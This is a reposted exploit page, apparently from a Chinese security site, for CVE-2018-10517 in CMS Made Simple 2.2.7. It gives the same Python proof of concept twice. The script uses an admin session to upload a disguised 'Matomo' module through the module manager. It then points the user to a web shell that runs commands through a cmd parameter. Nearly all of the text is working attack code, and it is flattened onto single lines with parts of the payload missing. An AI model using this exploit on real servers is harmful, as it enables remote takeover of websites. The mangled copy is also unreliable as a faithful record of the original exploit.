# CVE-2018-10517 CMS Made Simple 2.2.7遠程代碼執行漏洞
==POC==
# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution # Date: 2018-11-04 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ # Version: 2.2.7 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-10517 # 1. Description: # An attacker or a malicious user with access to the administration interface can execute code on the server. # 2. Proof of Concept: import requests # target configuration (required admin credentials in order to obtain a valid session) target_url="" session_cookie = " " session_value = " " # upload of shell unde the name of Matomo plugin burp0_url = target_url + "/admin/moduleinterface.php" burp0_cookies = {session_cookie: session_value} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data="-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n \n \r\n-----------------------------207726338310671742711263591267--\r\n" requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print "Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al"1.3 \nMatomo \n0.0.1 \n2.1.5 \n\n \n \n \n \n/ \n1 \n\n \n/action.admin_settings.php \n0 \n \n\n \n/action.admin_statistics.php \n0 \n \n\n \n/action.default.php \n0 \n \n\n \n/action.savesettings.php \n0 \n \n\n \n/lang/ \n1 \n\n \n/lang/en_US.php \n0 \n \n\n \n/Matomo.module.php \n0 \n \n\n \n/moduleinfo.ini \n0 \n \n\n \n/templates/ \n1 \n\n \n/templates/adminsettings.tpl \n0 \n \n
==EXP==
# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution # Date: 2018-11-04 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://www.cmsmadesimple.org/ # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/ # Version: 2.2.7 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-10517 # 1. Description: # An attacker or a malicious user with access to the administration interface can execute code on the server. # 2. Proof of Concept: import requests # target configuration (required admin credentials in order to obtain a valid session) target_url="" session_cookie = " " session_value = " " # upload of shell unde the name of Matomo plugin burp0_url = target_url + "/admin/moduleinterface.php" burp0_cookies = {session_cookie: session_value} burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267", "Connection": "close", "Upgrade-Insecure-Requests": "1"} burp0_data="-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n \n \r\n-----------------------------207726338310671742711263591267--\r\n" requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) print "Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al"1.3 \nMatomo \n0.0.1 \n2.1.5 \n\n \n \n \n \n/ \n1 \n\n \n/action.admin_settings.php \n0 \n \n\n \n/action.admin_statistics.php \n0 \n \n\n \n/action.default.php \n0 \n \n\n \n/action.savesettings.php \n0 \n \n\n \n/lang/ \n1 \n\n \n/lang/en_US.php \n0 \n \n\n \n/Matomo.module.php \n0 \n \n\n \n/moduleinfo.ini \n0 \n \n\n \n/templates/ \n1 \n\n \n/templates/adminsettings.tpl \n0 \n \n
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容